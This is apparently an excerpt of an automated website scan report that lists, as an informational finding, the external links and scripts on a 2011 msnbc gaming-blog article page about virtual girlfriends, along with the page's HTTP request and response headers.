...[SNIP]...
<div id="vine-inlinePhoto__5917266" data-contentId="5917266" class="inlinePhoto photo_portrait photo_align_right user_inline_photo" style="width:319px;"><img id="wbenedetti/5917266.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/wbenedetti/5917266.jpg" width="319" height="478" alt="" /><!-- end5917266 -->
...[SNIP]...
<p>It seems we here in the U.S. are sliding down the slippery slope toward the kind of infatuation with <a target="_blank" href="http://www.nytimes.com/2009/07/26/magazine/26FOB-2DLove-t.html">virtual</a> and <a target="_blank" href="http://www.nytimes.com/2009/07/26/magazine/26FOB-2DLove-t.html">stuffed girlfriends</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/71ibW3ibkOI&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div id="vine-inlineCode__5916158" class="inlineCode photo_align_block" data-contentid="5916158"><object width="592" height="346" id="msnbc365677" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0"><param name="movie" value="http://www.msnbc.redacted/id/32545640" />
...[SNIP]...
</em><a target="_blank" href="http://bit.ly/caLhBE"><em>
...[SNIP]...
</em><a target="_blank" href="http://twitter.com/WindaBenedetti"><em>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy" data-Text="'My Virtual Girlfriend' is real-world creepy">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://scifiwriter7203.newsvine.com/">scifiwriter7203</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://natalie-fl.newsvine.com/">Hot-in-Miami</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<div class="normal"><a href="http://DevAvo.newsvine.com/">DevAvo</a>
...[SNIP]...
<div class="normal"><a href="http://swhitcomb1.newsvine.com/">Sean-336944</a>
...[SNIP]...
<div class="normal"><a href="http://Dizzal.newsvine.com/">minnysotaboy</a>
...[SNIP]...
<div class="normal"><a href="http://sanescience.newsvine.com/">Sanescience</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Lovesssappsss.newsvine.com/">Lovesss appsss</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Lovesssappsss.newsvine.com/">Lovesss appsss</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://duncandilnuts.newsvine.com/">Antonio V</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://roquemocan.newsvine.com/">rmocan</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://lovesssappsss1.newsvine.com/">Lovesss appsss</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://3scruseloose.newsvine.com/">3scruseloose</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Asterisk2267293.newsvine.com/">Asterisk-2267293</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://xalener.newsvine.com/">xalener</a>
...[SNIP]...
<div class="normal"><a href="http://tchoupitoulas1.newsvine.com/">Tchoupitoulas</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://lovesssappsss1.newsvine.com/">Lovesss appsss</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mikeamerson.newsvine.com/">mike amerson</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mikeamerson.newsvine.com/">mike amerson</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://keith-1135394.newsvine.com/">keith-1135394</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://goorganic2.newsvine.com/">go organic</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Calidudebeautifull.newsvine.com/">Calidude69bella</a>
...[SNIP]...
<div class="normal"><a href="http://mikeamerson.newsvine.com/">mike amerson</a>
...[SNIP]...
<div class="normal"><a href="http://Dizzal.newsvine.com/">minnysotaboy</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://rvanderbrink.newsvine.com/">PuddleDuck</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://rodentrack.newsvine.com/">Rodentrack</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://ToastyMcGrath.newsvine.com/">Toasty McGrath</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://4570govt.newsvine.com/">2blunt4drivels</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://belzebu.newsvine.com/">Belzebu</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://tooquiet4me2005.newsvine.com/">MS in VA</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://davidam1262.newsvine.com/">david1262</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MsMeredith.newsvine.com/">Ms.Meredith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://goorganic2.newsvine.com/">go organic</a>
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
<div class="normal"><a href="http://Kinjiru.newsvine.com/">Kinjiru</a>
...[SNIP]...
<div class="normal"><a href="http://jtj.newsvine.com/">JIM-254362</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Dizzal.newsvine.com/">minnysotaboy</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Marcusarilius.newsvine.com/">Marcusarilius</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ronnkelley.newsvine.com/">Truckin Ronn</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://mrwashburn.newsvine.com/">mrwashburn</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://YeenVeen.newsvine.com/">YeenVeen</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Kinjiru.newsvine.com/">Kinjiru</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mikeamerson.newsvine.com/">mike amerson</a>
...[SNIP]...
<div class="normal"><a href="http://TishomingoKid.newsvine.com/">skip Nicholson, Oklahoma City</a>
...[SNIP]...
<div class="normal"><a href="http://robert8777.newsvine.com/">Robert8777</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://nothappy2494184.newsvine.com/">nothappy-2494184</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://windabenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/windabenedetti-1131361638.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">Follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.94. http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ingame.msnbc.msn.com
Path:   /_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy?chromedomain=technolog HTTP/1.1
Host: ingame.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=278
Date: Sun, 30 Jan 2011 17:53:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109211


<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>In-Game - 'My Virtual
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://ingame.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a13fb07a18e3230078b48aadd2b832aa48d9f59f.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/8279c89e6cbfbec39495cd10332ce1234f0aa2d8.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/ingame/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=c5916141&amp;rand=301353978&amp;do=msnbc.redacted&amp;ad=9:9:80;44::;27:27:108;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;9:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://ingame.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<div id="vine-inlinePhoto__5917266" data-contentId="5917266" class="inlinePhoto photo_portrait photo_align_right user_inline_photo" style="width:319px;"><img id="wbenedetti/5917266.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/wbenedetti/5917266.jpg" width="319" height="478" alt="" /><!-- end5917266 -->
...[SNIP]...
<p>It seems we here in the U.S. are sliding down the slippery slope toward the kind of infatuation with <a target="_blank" href="http://www.nytimes.com/2009/07/26/magazine/26FOB-2DLove-t.html">virtual</a> and <a target="_blank" href="http://www.nytimes.com/2009/07/26/magazine/26FOB-2DLove-t.html">stuffed girlfriends</a>
...[SNIP]...
</param><embed src="http://www.youtube.com/v/71ibW3ibkOI&amp;hl=en_US&amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="600" height="429"></embed>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div id="vine-inlineCode__5916158" class="inlineCode photo_align_block" data-contentid="5916158"><object width="592" height="346" id="msnbc365677" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0"><param name="movie" value="http://www.msnbc.redacted/id/32545640" />
...[SNIP]...
</em><a target="_blank" href="http://bit.ly/caLhBE"><em>
...[SNIP]...
</em><a target="_blank" href="http://twitter.com/WindaBenedetti"><em>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy" data-Text="'My Virtual Girlfriend' is real-world creepy">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://ingame.msnbc.redacted/_news/2011/01/25/5916141-my-virtual-girlfriend-is-real-world-creepy" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://scifiwriter7203.newsvine.com/">scifiwriter7203</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://natalie-fl.newsvine.com/">Hot-in-Miami</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://OhMy999999.newsvine.com/">OhMy999999</a>
...[SNIP]...
<div class="normal"><a href="http://DevAvo.newsvine.com/">DevAvo</a>
...[SNIP]...
<div class="normal"><a href="http://swhitcomb1.newsvine.com/">Sean-336944</a>
...[SNIP]...
<div class="normal"><a href="http://Dizzal.newsvine.com/">minnysotaboy</a>
...[SNIP]...
<div class="normal"><a href="http://sanescience.newsvine.com/">Sanescience</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Lovesssappsss.newsvine.com/">Lovesss appsss</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Lovesssappsss.newsvine.com/">Lovesss appsss</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://duncandilnuts.newsvine.com/">Antonio V</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://roquemocan.newsvine.com/">rmocan</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://lovesssappsss1.newsvine.com/">Lovesss appsss</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://3scruseloose.newsvine.com/">3scruseloose</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Asterisk2267293.newsvine.com/">Asterisk-2267293</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://xalener.newsvine.com/">xalener</a>
...[SNIP]...
<div class="normal"><a href="http://tchoupitoulas1.newsvine.com/">Tchoupitoulas</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
